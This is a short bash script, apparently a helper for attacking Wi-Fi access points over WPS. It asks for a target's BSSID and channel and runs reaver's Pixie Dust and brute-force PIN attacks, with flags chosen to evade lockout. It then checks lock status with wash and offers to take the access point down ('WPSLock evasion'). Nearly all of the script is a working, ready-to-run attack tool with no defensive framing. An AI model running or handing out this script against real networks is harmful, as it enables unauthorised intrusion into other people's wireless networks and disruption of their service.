#!/bin/bash
echo "Checking airodum-ng WPS..."
if airodump-ng | grep -q "Display WPS information"
then
	if iwconfig | grep -q "wlan0mon"
	then
		airodump-ng wlan0mon --wps
		read -p "Enter target's BSSID:" BSSID
		read -p "Enter target's channel:" CH
		echo "Starting reaver..."
		reaver -i wlan0mon -c $CH -b $BSSID -K 1
		read -p "Continue with bruteforce? [Y/n]" MODE
		if [ "$MODE" == "Y" ]
		then
			read -p "Speed up? [Y/n]" MODE
			if [ "$MODE" == "Y" -o "$MODE" == "y" ]
			then
				reaver -i wlan0mon -c $CH -b $BSSID -f -E -L -d 0 -S
			else
				reaver -i wlan0mon -c $CH -b $BSSID -f -E -L
			fi
		fi
		echo "Checking if WPS is locked..."
		xterm -e wash -i wlan0mon -C
		read -p "Kill AP (WPSLock evasion)? [Y/n]" MODE
		if [ "$MODE" == "Y" -o "$MODE" == "y" ]
		then
			killap $BSSID
		fi
		read -p "Restart? [Y/n]" MODE
		if [ "$MODE" == "Y" -o "$MODE" == "y" ]
		then
			./wpsh
		else
			echo "Shutting down..."
			exit 0
		fi
	else
		./mmode silent
		./wpsh
	fi
else
	echo "You have old version aircrack-ng or not have this program"
	read -p "Install aircrack-ng? [Y/n]:" DWN
	if [ "$DWN" == "Y" -o "$DWN" == "y" ]
	then
		apt-get autoremove aircrack-ng
		apt-get install aircrack-ng
		read -p "Reboot your pc? [Y/n]:" REB
		if [ "$REB" == "Y" -o "$REB" == "y" ]
		then
			reboot
		else
			exit 0
		fi
	else
		exit 0
	fi
fi
